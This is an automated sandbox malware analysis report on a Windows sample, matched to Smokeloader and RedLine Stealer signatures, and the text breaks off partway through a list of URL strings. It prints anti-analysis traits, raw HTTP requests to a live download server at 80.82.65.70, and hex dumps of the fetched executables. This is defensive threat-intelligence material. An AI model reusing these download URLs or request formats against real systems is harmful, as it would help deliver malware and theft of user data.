Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1574228
MD5:602574ce5a6eea6388a2d30a490ddfa9
SHA1:efe09508381076205f1b23a03b1baea6d36eaa95
SHA256:9edabdb564b79176743506ba6466765f5193ab2ce29f7bcbbb7f1a694ed54768
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 602574CE5A6EEA6388A2D30A490DDFA9)
    • WerFault.exe (PID: 6532 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1060:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
Antivirus detection for URL or domain
Source: http://80.82.65.70/soft/download.Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exeReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: file.exeVirustotal: Detection: 53%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B33817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04B33817
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4794E FindFirstFileExW,0_2_04B4794E
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 05:12:55 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 05:12:57 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 80.82.65.70 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000002.2926408710.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: file.exe, 00000000.00000002.2923721847.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2923721847.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/downloads
Source: file.exe, 00000000.00000002.2923721847.0000000000FC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key
Source: file.exe, 00000000.00000003.2286381372.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/download
Source: file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/downloadB
Source: file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/downloadMicrosoft
Source: file.exe, 00000000.00000003.2558937779.0000000005779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download;.C
Source: file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadB
Source: file.exe, 00000000.00000003.2361967106.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadMicrosoft
Source: file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadP
Source: file.exe, 00000000.00000003.2611753282.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2558937779.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610619412.0000000005779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadPROu=
Source: file.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2437588864.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadh
Source: file.exe, 00000000.00000003.2311558878.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2286381372.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadns
Source: file.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336836012.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412397203.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2387108968.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311558878.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2437588864.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 